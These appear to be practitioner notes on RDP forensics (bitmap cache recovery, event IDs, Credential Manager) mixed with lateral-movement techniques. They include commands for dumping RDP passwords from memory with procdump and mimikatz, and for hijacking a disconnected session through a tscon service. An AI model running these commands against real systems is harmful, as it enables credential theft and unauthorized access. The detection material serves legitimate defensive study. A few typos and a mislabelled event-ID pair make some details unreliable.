RDP

Event Logs:

Disconnect/Reconnect: 4778/4779

Forensics:

Souce and Destination artifacts:

Bitmap Cache

Bitmap cache will cache still standing images of an RDP session so that they can be referenced instead of retransmitted. The purpose of this is to optimize RDP session.

We can leverage this artifact to collect what the TA saw during the RDP session. Useful for proving what a TA might've opened or actions they performed.

File Location:

C:\Users\USERNAME\AppData\Local\Microsoft\Terminal Server Client\Cache\*

Cache files are stored in .bin files.

Execute bmc-tools:

bmc-tools.py -s ./ -d ./output

The output images will be saved to output folder.

We can then stitch together these image pieces using RDP Cache Sitcher.

Grab the compiled release version of the software and then open up the directory the image tiles are stored in. We can then stitch together tiles to make a complete image.

RDP Clipbaord Forensics

RDP Lateral Movement

RDP credentials are stored in LSASS of the target computer. The plaintext passwords can be dumped from LSASS using mimikatz.

Introduced in Windows Server 2012 R2 and Windows 8.1, Restricted Admin mode provides additional security to remote logon scenarios. This mode of Remote Desktop causes the client application to perform a network logon challenge-response with the NT one-way function (NTOWF) or use a Kerberos service ticket when authenticating to the remote host. After the administrator is authenticated, the administrator does not have the respective account credentials in LSASS because they were not supplied to the remote host. Instead, the administrator has the computer account credentials for the session. Administrator credentials are not supplied to the remote host, so actions are performed as the computer account. Resources are also limited to the computer account, and the administrator cannot access resources with his own account.

Dump Passwords in Terminal Services:

Query svchost running Terminal Services.

#service
sc queryex termservice

#task running rdpcorets
tasklist /M:rdpcorets.dll

#netstat for TermService
netstat -nob | Select-String TermService -Context 1

Dump process or select-string for password in memory.

#select string for password hint, difficult to find unless you know it.
strings -el svchost* | grep Password123 -C3

#dump process with task manager or procdump
procdump64.exe -ma 988 -accepteula C:\Users\pentestlab

#mimikatz rdp extract
privilege::debug
ts::logonpasswords

Detection:

Look for .dmp files on the host.

Dump saved credentials via DPAPI:

Credential Manager Location:

C:\Users\username\AppData\Local\Microsoft\Credentials

Credentials are stored in Credential Manager, not in .rdp files.
.rdp files reference credential manager for creds.

Detection:

Tscon to hijack open RDP connections:

Requires SYSTEM privs to accomplish.

psexec -s \\localhost cmd

Another method is to create a service that will connect selected session to ours.

Get all sessions information:

C:\Windows\system32>query user
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
 administrator                             1  Disc            1  3/12/2017 3:07 PM
>localadmin            rdp-tcp#55          2  Active          .  3/12/2017 3:10 PM

C:\Windows\system32>

Create service which will hijack user's session:

C:\Windows\system32>sc create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#55"
[SC] CreateService SUCCESS

Start service:

net setart sesshijack

Detection:

Event IDS4778 (logon) and4779(logoff) events can be used to figure out which desktop sessions got disconnected/reconnected.
Tscon running as SYSTEM
Tscon executed as SYSTEM from persistence method scheduled task, service, WMI, etc.